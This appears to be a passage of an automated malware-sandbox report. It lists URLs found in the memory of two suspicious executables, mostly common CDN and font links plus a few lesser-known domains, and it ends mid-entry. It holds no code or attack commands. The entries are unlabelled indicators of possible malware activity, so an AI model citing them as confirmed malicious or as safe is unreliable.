                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000158C000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.543802366.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.738728504.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.832351846.00000000076D5000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000015A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yoruksut.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.832351846.00000000076D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yoruksut.com/)
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.739674320.00000000076C3000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.651017417.00000000076C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yoruksut.com/I
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000158C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yoruksut.com/P
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.651017417.00000000076C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yoruksut.com/a
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.738728504.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000015A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yoruksut.com/x
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.832351846.00000000076D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yumgiskor.kz/
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.832351846.00000000076D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yumgiskor.kz/9
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/prototype/1.7.1.0/prototype.js?ver=1.7.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/effects.js?ver=1.9.0
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/scriptaculous.js?ver=1.9.0
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.740633377.00000000050B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533361544.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.832351846.000000000772F000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://browsehappy.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582969088.0000000005120000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709547478.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.iubenda.com/iubenda.js
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.528726297.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530679965.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655090543.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.css
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.521508837.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.528726297.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.520474441.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652811266.0000000003950000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.519635310.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.643655921.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652144923.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530679965.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-2.1.4.min.js
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.651017417.0000000007697000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650670746.0000000007689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://entexture.com
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.528726297.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530679965.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655090543.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535596512.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530743113.0000000004200000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533336279.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542006080.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539899312.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Poppins%3Aital%2Cwght%400%2C100%3B0%2C200%3B0%2C300%3B0%2C5
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A300%2C300i%2C400%2C400i%2C700%2C700i&#038;subset=la
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, 